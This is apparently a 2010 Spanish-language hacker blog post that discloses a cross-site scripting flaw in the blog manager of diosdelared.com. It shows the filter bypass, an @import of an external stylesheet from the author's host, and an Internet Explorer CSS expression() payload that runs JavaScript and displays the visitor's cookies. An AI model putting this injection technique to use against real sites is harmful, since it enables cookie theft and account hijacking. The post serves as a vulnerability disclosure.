[Facebook] [Ask] [Bloglines] [del.icio.us] [Digg] [Furl] [Google] [MySpace] [Reddit] [Rojo] [Sphinn] [Spurl] [StumbleUpon] [Technorati] [Twitter] [Windows Live] [Yahoo!] [Email]

Diosdelared.com XSS By n350k

El día de ayer el Murdereño me pidió que le ayudara a testiar unas supuestas vulnerabilidades en ddlr las cuales fueron un total fake.

El caso es que yo seguí haciendo mi pentest personal y encontre un XSS en el blog manager.

Hoy le hago saber que tengo el xss, luego se pregunta ¿como un xss se pudo salvar tanto tiempo?

yo con toda humildad que siempre demuestro os contesto que duro tanto tiempo porque jamas le habia hecho un test.

 

Bueno críos míos hay les dejo mi análisis

Muy "listo" El Editor de estilo no permite usar comillas dobles, ni comillas simples ni ampersands

Y si usas url completas el sistema les pone de prefijo la url http://www.diosdelared.com/redirect.php?go=

Pero eso es cosa que a mi no me interesa yo necesito usar comillas y si no es en su hoja de estilo sera en la mia :P

 

CSS import

Este bypass es de lo mas sensillo y si no lo habían hecho antes es por desconocer los recursos del lenguage, lo que me deja mucho que pensar... pero bueno.

Hacemos un import a una hoja de estilos externa, esto para poder usar comillas ya que en la hoja que nos proporciona el blog manager no lo permite.

@import url(`http://malandrines.net/css/n350k.css`);

Javascript Injection

body {
background-color: expression( if ( typeof n350k == 'undefined' ) { void( n350k = {
yeahfuck: function () {
alert( 'Malandrines.net LOS MEJORES BABY ;)\n\n XSS IE 5,6,7 & 8 \n\n by n350k'+document.cookie );
}
} ) + n350k.yeahfuck() } );
}

OWNED


Test Online: http://n350k.diosdelared.com/ Usa ie 5,6,7 y 8 en modo no estandar ;)

(FIXED) sitado en http://n350k.diosdelared.com/?coment=5121

NOTAS:

Como es de esperarse no falta el MAMON que diga hay hay hay yo uso Firefox a quí no pasa nada
pues les explico ya que supongo que tambien desconocen la propiedad expression

Esta propiedad pertenece a Internet Explorer asi que solo allí podran probar, y diran lo que quieran pero un buen desarrollador debe hacer que sus aplicaciones funcionen correctamente en lo que le pongan.

Otro dato curioso es que IE es usado (Lejos) muchas veces mas que firefox en el mundo así que los que se dedican al desarrollo mas vale y lo tomen en cuenta.

Díganme si no soy tan bueno como me creo.... by n350k 2010

Writing by: n350k Date: 2010-01-13 18:10:00
Gr33tz: w3r0x, bikolinux, 50ck0, Poison.san, Xp3rm4, g4b0, z3r0-zo0rg(Gay),ukn0wz, b3n0x and Mafia boys CreW, Dios De La Red, Fatal error
Fucking White hat's

Rola este r00t: [Facebook] [Ask] [Bloglines] [del.icio.us] [Digg] [Furl] [Google] [MySpace] [Reddit] [Rojo] [Sphinn] [Spurl] [StumbleUpon] [Technorati] [Twitter] [Windows Live] [Yahoo!] [Email]

Últimos artículos:

De interés:
tools.malandrines.net Tefacturo.com

Anúnciate aquí

Música

Nodes
c0ding & Design by n350k Power OS 4b0u7 SlackWare